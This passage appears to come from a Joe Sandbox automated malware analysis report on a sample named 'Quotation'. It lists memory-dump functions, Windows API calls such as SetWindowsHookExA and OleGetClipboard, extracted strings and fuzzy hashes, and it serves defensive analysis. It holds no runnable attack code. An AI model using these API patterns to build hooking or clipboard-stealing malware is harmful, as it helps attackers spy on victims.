GetCurrentThread.KERNEL32 ref: 3B675F4B
GetCurrentProcess.KERNEL32 ref: 3B675F88
GetCurrentThreadId.KERNEL32 ref: 3B675FE1

Memory Dump Source

Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 88d0d59c3f09e0d37a76c76a5ac4ac53a8111786c64687f4f92331a9f5de7035
Instruction ID: bc15561bf06c99555bfecc29b4d10534a1a56e4652cd6b3312d609df0cacde71
Opcode Fuzzy Hash: 88d0d59c3f09e0d37a76c76a5ac4ac53a8111786c64687f4f92331a9f5de7035
Instruction Fuzzy Hash: C85145B09007499FDB14DFAAD549BAEBBF1EF48310F248059E409A7391D7749940CFA6

Function 3B675E90 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 3B675F0E
GetCurrentThread.KERNEL32 ref: 3B675F4B
GetCurrentProcess.KERNEL32 ref: 3B675F88
GetCurrentThreadId.KERNEL32 ref: 3B675FE1

Memory Dump Source

Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 2e023471c3a9db69552cda63da2d0069348453ce44677bdd9e676a7f7b8fb16f
Instruction ID: dbe9bfc15b46decf2e709f7bdad15b0726da3e05f67b76ace3e55c9a7a4a5e95
Opcode Fuzzy Hash: 2e023471c3a9db69552cda63da2d0069348453ce44677bdd9e676a7f7b8fb16f
Instruction Fuzzy Hash: FA5146B09007498FDB04DFAAD545BAEBBF1EF48310F248059E419A7351D7749940CFA6

Function 3AB4AD60 Relevance: 4.1, Strings: 3, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XM, xrefs: 3AB4B10B
DR48, xrefs: 3AB4B097
XM, xrefs: 3AB4B1EC

Memory Dump Source

Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd

Similarity

API ID:
String ID: DR48$XM$XM
API String ID: 0-1052184767
Opcode ID: 24ecab17419762e4529ef5b828091d47a63ca10285e8e175841a7fb813283a7f
Instruction ID: 74fe5191074bb73df59c64fb54b4ea956605cef1deedcfe833558fdfc06454bb
Opcode Fuzzy Hash: 24ecab17419762e4529ef5b828091d47a63ca10285e8e175841a7fb813283a7f
Instruction Fuzzy Hash: B1E19D74B00319CBEB25DBA8D49169EB7B6EF89300F24852EE415EB350DB34DC46EB91

Function 0015A1CC Relevance: 4.0, Strings: 3, Instructions: 294
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@148, xrefs: 0015A10D
@148, xrefs: 0015A14C
], xrefs: 0015A174

Memory Dump Source

Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Quotation.jbxd

Similarity

API ID:
String ID: @148$@148$]
API String ID: 0-115542519
Opcode ID: b6171e7b00b168f8bfab653750c6be6cab1e309c228d53fb0d9713ae16d4dc99
Instruction ID: ac34d5ff4ea217c17e4f6cf86d8b3bbd7f1469af4c637c2ac6d262d6578c930e
Opcode Fuzzy Hash: b6171e7b00b168f8bfab653750c6be6cab1e309c228d53fb0d9713ae16d4dc99
Instruction Fuzzy Hash: C8B18234A40204CFDB14DBA8D894AADB7F2FF88311F648569E816EB351DB71DC46CB92

Function 3AB4B6E8 Relevance: 3.0, Strings: 2, Instructions: 469COMMON

Download Yara Rule

Strings

(\48, xrefs: 3AB4BBDA
(\48, xrefs: 3AB4BCCE

Memory Dump Source

Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd

Similarity

API ID:
String ID: (\48$(\48
API String ID: 0-3471131829
Opcode ID: a2a7201b4d68e76c70cb61da1f66a5f34ebdfce7193f4f633f69bd59a5c83840
Instruction ID: 55acb304b3de6b72c2ff5844f43d0ff176e37a597c7e3963ce3eaff4b70d6d1a
Opcode Fuzzy Hash: a2a7201b4d68e76c70cb61da1f66a5f34ebdfce7193f4f633f69bd59a5c83840
Instruction Fuzzy Hash: 5B029C34A002198FEB54CFA8C49079DB7F6EB89350F24856AE505EB342DB35DD82EB91

Function 3AB42071 Relevance: 2.6, Strings: 2, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@148, xrefs: 3AB42175
@148, xrefs: 3AB4210D

Memory Dump Source

Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd

Similarity

API ID:
String ID: @148$@148
API String ID: 0-3693958652
Opcode ID: aba897855ed017c7a6dc4080ea7412ee5a7e08f78d89075fe608bf242dc22a03
Instruction ID: 1d58c51d179827e45631cc02053d16fb75ac71a6f9a5b04f350584fbab6fac23
Opcode Fuzzy Hash: aba897855ed017c7a6dc4080ea7412ee5a7e08f78d89075fe608bf242dc22a03
Instruction Fuzzy Hash: 25316C35A002159FDB09CFB4C854A9EBBF2FF89300F108519E846E7350EB70AC46EB51

Function 3AB42080 Relevance: 2.6, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@148, xrefs: 3AB42175
@148, xrefs: 3AB4210D

Memory Dump Source

Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd

Similarity

API ID:
String ID: @148$@148
API String ID: 0-3693958652
Opcode ID: 6f65a862e9b8d540f9ecce1797b63776958ea83998b8fb2c04d991bcc2e76610
Instruction ID: 2e929579d2eb3e15443ba9b8986609df908538eb01afbbf8fd1a24636ad509f9
Opcode Fuzzy Hash: 6f65a862e9b8d540f9ecce1797b63776958ea83998b8fb2c04d991bcc2e76610
Instruction Fuzzy Hash: 6B316135E002199BDB09DFA4C854A9EBBF6FF89340F508519E946E7350EB70AC42EB91

Function 0015A073 Relevance: 2.6, Strings: 2, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@148, xrefs: 0015A10D
@148, xrefs: 0015A14C

Memory Dump Source

Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Quotation.jbxd

Similarity

API ID:
String ID: @148$@148
API String ID: 0-3693958652
Opcode ID: 46f0e386c5e15efd98bfb4da41829bfa52c196f2489a30d596f1c661cc3cb348
Instruction ID: d1623a2eb6c7f854cda88ce632339733c5d663b690ed4ff7d3cca37b0f1177e6
Opcode Fuzzy Hash: 46f0e386c5e15efd98bfb4da41829bfa52c196f2489a30d596f1c661cc3cb348
Instruction Fuzzy Hash: 9E317C70E00609DFDB15CF65D890A9EFBB2BF89301F50861AE815AB351DB71984ACB92

Function 0015A080 Relevance: 2.6, Strings: 2, Instructions: 78COMMON

Download Yara Rule

Strings

@148, xrefs: 0015A10D
@148, xrefs: 0015A14C

Memory Dump Source

Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Quotation.jbxd

Similarity

API ID:
String ID: @148$@148
API String ID: 0-3693958652
Opcode ID: c7851f9b7b0e826c4dd9a4b511401ce0ffe311e3bdde1b913c98bb757fc43e30
Instruction ID: c906988b0f763f6243a222befa6ddbb5c64e1b142bb7775cf8b13990a396cc91
Opcode Fuzzy Hash: c7851f9b7b0e826c4dd9a4b511401ce0ffe311e3bdde1b913c98bb757fc43e30
Instruction Fuzzy Hash: 2F217E30A10609DBCB15CFA9C890A9EF7B6BF89300F50861AE815BB341DB709C46CB92

Function 00159F70 Relevance: 2.6, Strings: 2, Instructions: 78COMMON

Download Yara Rule

Strings

D048, xrefs: 00159FEA
D048, xrefs: 0015A02B

Memory Dump Source

Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Quotation.jbxd

Similarity

API ID:
String ID: D048$D048
API String ID: 0-3284924686
Opcode ID: 99dd41f656a452fd687958dac9231f0c5a47b1c484e6307859b13e52910e290e
Instruction ID: a001d3a083f0e1be998d2abf046ec125a647e9052f4c5c980711131bbd39e3a6
Opcode Fuzzy Hash: 99dd41f656a452fd687958dac9231f0c5a47b1c484e6307859b13e52910e290e
Instruction Fuzzy Hash: F7216031E10305DFCB15CFA4D45059EBBB2BF85700F60861AE825FB390EB75984ACB52

Function 00159F80 Relevance: 2.6, Strings: 2, Instructions: 70COMMON

Download Yara Rule

Strings

D048, xrefs: 00159FEA
D048, xrefs: 0015A02B

Memory Dump Source

Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Quotation.jbxd

Similarity

API ID:
String ID: D048$D048
API String ID: 0-3284924686
Opcode ID: ce2c5150f93741f345420fb615241cb5f38ef2b9649dfb7bbeed1de9c6100305
Instruction ID: 3b3d5523f0f4335cfee6eee290d0a19954685e01a2c09ac2e0d014fa4473685f
Opcode Fuzzy Hash: ce2c5150f93741f345420fb615241cb5f38ef2b9649dfb7bbeed1de9c6100305
Instruction Fuzzy Hash: BA213030E10205DBCB19CFA4D45099EFBB2BF89311F60861AE826FB390DB7498498B51

Function 3B67236F Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3B67248A

Memory Dump Source

Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: e2db46bdcca7dadb6bfb6dd30ada19ef16451e2ed2a3307c2e797ce5468b1a33
Instruction ID: 3e8531cf44e5bc4e45931c66950bccffbd131807a95c91fd7d1853c24f70d90d
Opcode Fuzzy Hash: e2db46bdcca7dadb6bfb6dd30ada19ef16451e2ed2a3307c2e797ce5468b1a33
Instruction Fuzzy Hash: AA51CFB5D003499FEB14CFA9D880ADEBFB5BF49310F24812AE819AB211D7749885CF91

Function 3B672378 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3B67248A

Memory Dump Source

Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 0a4537698a63ccd1c063eb3bd19fff26623d62bca1c68a11c09a6a889ee7ecff
Instruction ID: fadad5ae5a9c6bfc7a11a4e7556ecf6922d27ab287605c865dc6e40bb39cc606
Opcode Fuzzy Hash: 0a4537698a63ccd1c063eb3bd19fff26623d62bca1c68a11c09a6a889ee7ecff
Instruction Fuzzy Hash: 7341C0B5D00309DFEB14CF9AD880ADEFBB5BF48310F20812AE419AB211D774A885CF91

Function 3B675C8C Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 3B677029

Memory Dump Source

Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: bada41751851693fe46a50dd76eff143d1af6f869ee6beb5113ee0651f2e8265
Instruction ID: ea025202b03132d0f34f257f2069e261a5094fd4c8789b0c7087f64d4574042c
Opcode Fuzzy Hash: bada41751851693fe46a50dd76eff143d1af6f869ee6beb5113ee0651f2e8265
Instruction Fuzzy Hash: 5A4149B8A00309CFDB00DF95C489AAABBF5FF88314F24C459E518A7321D775A941CFA1

Function 3B677CA4 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 3B677D38

Memory Dump Source

Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 8803770c3dead743239ac5ddd0ccd1bf69ceb595076180a1ef8c7a30b04d0a35
Instruction ID: dce8a0f92375e8c4b9571b8074683f08e3b4e1307f079f7c263db5f9a1031074
Opcode Fuzzy Hash: 8803770c3dead743239ac5ddd0ccd1bf69ceb595076180a1ef8c7a30b04d0a35
Instruction Fuzzy Hash: 5C31F2B0902248DFEB10DFA9C585BEDBBB1AF48314F24805AE404BB391DB75A845CF51

Function 3B677CB0 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 3B677D38

Memory Dump Source

Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 0d30f293b1140e80a6a41806fd9f6e0985720c8bab484c2d2c0db0854ba15331
Instruction ID: f11c45c3a3a642aa67094ac421a5a57956b660481ad38f2c6140c38cac31ebe3
Opcode Fuzzy Hash: 0d30f293b1140e80a6a41806fd9f6e0985720c8bab484c2d2c0db0854ba15331
Instruction Fuzzy Hash: 8631E0B0902308DFEB10DF99C985BEEBBF5AF48314F24805AE404BB391DB74A845CB65

Function 3B6760D0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3B67615F

Memory Dump Source

Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d45b374f39e83bedc5bcecc4f48d93f0c96538771d99fd0af4475e3c9c752d06
Instruction ID: daafe59cc1308df3619ade072922269052772dc7b8077bd9fce6f003212ebfd0
Opcode Fuzzy Hash: d45b374f39e83bedc5bcecc4f48d93f0c96538771d99fd0af4475e3c9c752d06
Instruction Fuzzy Hash: 2C21D4B59002499FDB10CFA9D584ADEBBF4EB48310F14841AE954A7311D374A940CF61

Function 3B6760D8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3B67615F

Memory Dump Source

Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: bcbf46eba49be8b32fb9ba901663aac027bf2405c59c9d5ea1e18e316b34ac5c
Instruction ID: c64be5a5cca7dfde7cad7a90bcaaaa55183eab47862d407dbb38bab93c378819
Opcode Fuzzy Hash: bcbf46eba49be8b32fb9ba901663aac027bf2405c59c9d5ea1e18e316b34ac5c
Instruction Fuzzy Hash: 1821F5B5900309AFDB10CFAAD984ADEFBF4EF48320F14801AE954A3311D378A940CF61

Function 3B6797E9 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 3B67986B

Memory Dump Source

Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 5360424a5d87be218d8a23239bb5364fa0edffd530e6770d2f60cc37d6369570
Instruction ID: 371bc61e51c9a3d29a4ccc555b9dad3c9f15e9cede30524789d0b70b0f936cf4
Opcode Fuzzy Hash: 5360424a5d87be218d8a23239bb5364fa0edffd530e6770d2f60cc37d6369570
Instruction Fuzzy Hash: 222115B5D002099FDB14CFAAD945BEEBBF5AF88310F24842AD459A7250C774A944CFA1

Function 3B6797F0 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 3B67986B

Memory Dump Source

Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 9997802bc79f37429f6f60f43bd91d580d33f85e5d85d3cb19ba013d636647ca
Instruction ID: b779eb5665b01af6b4d84709b56a0c7c30b3635b8b2e37856bed80252287874f
Opcode Fuzzy Hash: 9997802bc79f37429f6f60f43bd91d580d33f85e5d85d3cb19ba013d636647ca
Instruction Fuzzy Hash: 122124B5D002099FDB04DFAAD844BEEFBF4EF88320F10842AD458A7290D774A944CFA1

Function 3B675CE4 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,3B677275), ref: 3B6772FF

Memory Dump Source

Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 0eeac090ef0ee84ed59cdb51ff8b14cf1997ec533f30ed22627eed5c847f62cc
Instruction ID: f1d525f3841a14b49034668976e3b630464886a6debeff0f6b678f0a27f5f1b8
Opcode Fuzzy Hash: 0eeac090ef0ee84ed59cdb51ff8b14cf1997ec533f30ed22627eed5c847f62cc
Instruction Fuzzy Hash: 251133B59003488FDB10DF9AD445BAEBBF4EF48320F20841AD928A7301D378A940CFA5

Function 3B677588 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 3B677BBD

Memory Dump Source

Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 65724d05d5a0c9763c6c85365bbb54236170e25033ab97d066cce066cc212e8b
Instruction ID: b8190e284949945f2a2e7ebee677a9f81988debbfdbdb80dd25db2479403978e
Opcode Fuzzy Hash: 65724d05d5a0c9763c6c85365bbb54236170e25033ab97d066cce066cc212e8b
Instruction Fuzzy Hash: CB1130B5800308CFDB10DFAAD485B9EBBF4EB48320F20846AD558A3300D378A940CFA5

Function 3B677B62 Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 3B677BBD

Memory Dump Source

Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 3dba206cdb28a55cc3e26cbc0a8ad82f0ce3ec21c979d9922f8b85d1c74d61a6
Instruction ID: 2182903496ed80e49d37f201e2bd51344f1fa674443cb0bae80e783f486b6f02
Opcode Fuzzy Hash: 3dba206cdb28a55cc3e26cbc0a8ad82f0ce3ec21c979d9922f8b85d1c74d61a6
Instruction Fuzzy Hash: B51112B5900349CFDB20DFAAD585BDEBBF4AF48320F20845AD458A3710D378A544CFA5

Function 3B677298 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,3B677275), ref: 3B6772FF

Memory Dump Source

Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: f7c423a5e04fefc347983242540b2587613918d53da530e721310c1832f2cbe2
Instruction ID: 48b3debfd39a478184ed41b9dd80573a22834c8f28aa5f10a499170d94b7e2a9
Opcode Fuzzy Hash: f7c423a5e04fefc347983242540b2587613918d53da530e721310c1832f2cbe2
Instruction Fuzzy Hash: 901133B59002498FDB20DF9AD445BEEBBF4EF48320F20841AD458A7301D374A540CFA1

Function 00153E74 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\Vcm, xrefs: 001540CB

Memory Dump Source

Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Quotation.jbxd

Similarity

API ID:
String ID: \Vcm
API String ID: 0-3044874373
Opcode ID: da6ee50d565f2cef1d7f9ce7ca0542181b775528ca2f6df0ee87b0ad3ece85f2
Instruction ID: 8fba4c2843befe4d5b84512b3b417792ab25adb2efa050634cdc5de87cc7cd5e
Opcode Fuzzy Hash: da6ee50d565f2cef1d7f9ce7ca0542181b775528ca2f6df0ee87b0ad3ece85f2
Instruction Fuzzy Hash: D4A16E70E00709CFDF10CFA9C9857DEBBF1AF48355F248129E824AB294DB749989CB91

Function 3AB44C10 Relevance: 1.4, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

*980*98D*98, xrefs: 3AB44C70

Memory Dump Source

Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd

Similarity

API ID:
String ID: *980*98D*98
API String ID: 0-1574348809
Opcode ID: 8c6084a6b0e4c2bc8716ecd72057134fc42967a0e60e56495dac4701dc45fb9e
Instruction ID: bbfb38d93df997f7023f9d3a90a65ad7d79fabd4b516147887f3057f62124a37
Opcode Fuzzy Hash: 8c6084a6b0e4c2bc8716ecd72057134fc42967a0e60e56495dac4701dc45fb9e
Instruction Fuzzy Hash: 40618E74A002189FEB549BE5C8147AEBBF6FF88300F248529E106AB395DF755D05AF90

Function 3AB44C01 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

*980*98D*98, xrefs: 3AB44C70

Memory Dump Source

Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd

Similarity

API ID:
String ID: *980*98D*98
API String ID: 0-1574348809
Opcode ID: a8fc9293c47f4327b4894c0ccfff34d20de2d4c0a434ebbd096477c6dd92a5dd
Instruction ID: 8eb3b42070d8de4ad254508edf48230598158fd29fcf288acad1993fb5d48850
Opcode Fuzzy Hash: a8fc9293c47f4327b4894c0ccfff34d20de2d4c0a434ebbd096477c6dd92a5dd
Instruction Fuzzy Hash: 42418D70A002089FEB559FE9C814BAEBBF7FF88300F248529E105AB395DF749C059B90

Function 3AB44BDC Relevance: 1.4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

*980*98D*98, xrefs: 3AB44C70

Memory Dump Source

Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd

Similarity

API ID:
String ID: *980*98D*98
API String ID: 0-1574348809
Opcode ID: 364dc1f7e9c4e0b5118b08258684e0e21d16ef244743f36cef5c9e185772bc9a
Instruction ID: 07820bcdf0a5abd51d3f58610dfa25320b81830f6d08cd8972df9bd29050c042
Opcode Fuzzy Hash: 364dc1f7e9c4e0b5118b08258684e0e21d16ef244743f36cef5c9e185772bc9a
Instruction Fuzzy Hash: 3A418074B002089FEB559FE9C81479EBBF6FF88300F24C52AE115AB395DB759C01AB90

Function 0015F228 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

48, xrefs: 0015F2C9

Memory Dump Source

Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Quotation.jbxd

Similarity

API ID:
String ID: 48
API String ID: 0-4269866926
Opcode ID: 94ac91aa7e36bd0b2be1333f751a041501e42f6d13cb324eb5a90ed5b5752029
Instruction ID: bb57e5de8ae8d4a2051bd2bfe0a70911cf8831e9f18f6da7e129f185ef56a863
Opcode Fuzzy Hash: 94ac91aa7e36bd0b2be1333f751a041501e42f6d13cb324eb5a90ed5b5752029
Instruction Fuzzy Hash: 5731AC306007418FC719EB38D4A166AB7E2AFC53127148A6DD06A8F791DF34ED4ACF81

Function 0015F238 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

48, xrefs: 0015F2C9

Memory Dump Source

Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Quotation.jbxd

Similarity

API ID:
String ID: 48
API String ID: 0-4269866926
Opcode ID: 415bd6b5b8fffc4e820da62c5e37633404c1cdf00bedaad73a51099d935c1646
Instruction ID: 18e01c3649fd6df622549bc2f47f9163612429a9f736183c743a1482b73bd84b
Opcode Fuzzy Hash: 415bd6b5b8fffc4e820da62c5e37633404c1cdf00bedaad73a51099d935c1646
Instruction Fuzzy Hash: 3F3167306007059BC719EB28D491A6AB3E6ABC5352710892CD06A9F751DF74EE0ACB81

Function 0015FD6F Relevance: 1.3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

:, xrefs: 0015FD70

Memory Dump Source

Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Quotation.jbxd

Similarity

API ID:
String ID: :
API String ID: 0-336475711
Opcode ID: 76e31058a2865af0a91810efd3dbf40fbad451a4a0a5348333dd7ec871df7667
Instruction ID: bd9f5486eaafc3228274a0ba882f1c4b9ce6f6a2cc3678a5cf29020884263844
Opcode Fuzzy Hash: 76e31058a2865af0a91810efd3dbf40fbad451a4a0a5348333dd7ec871df7667
Instruction Fuzzy Hash: B9219E70701282DBCB14CF75C58067E77FAAB5A395B158129CC65EB261FB35CD0B8B81

Function 0015E1C0 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

|, xrefs: 0015E220

Memory Dump Source

Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Quotation.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 2b3d8a059811ed799cb6620dfb6883227c6c8af81ae2e65be09cde98be15f1c8
Instruction ID: ac35d51250ba0a38e5777e12e86e23ab49e80d77b88181dc2e31c502768c38b8
Opcode Fuzzy Hash: 2b3d8a059811ed799cb6620dfb6883227c6c8af81ae2e65be09cde98be15f1c8
Instruction Fuzzy Hash: FD116D74B00210DFDB54DBB88808BAEBBF6AF4C740F1044A9E91AEB390DB759D058B90

Function 00150838 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

Ko, xrefs: 00150884

Memory Dump Source

Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin
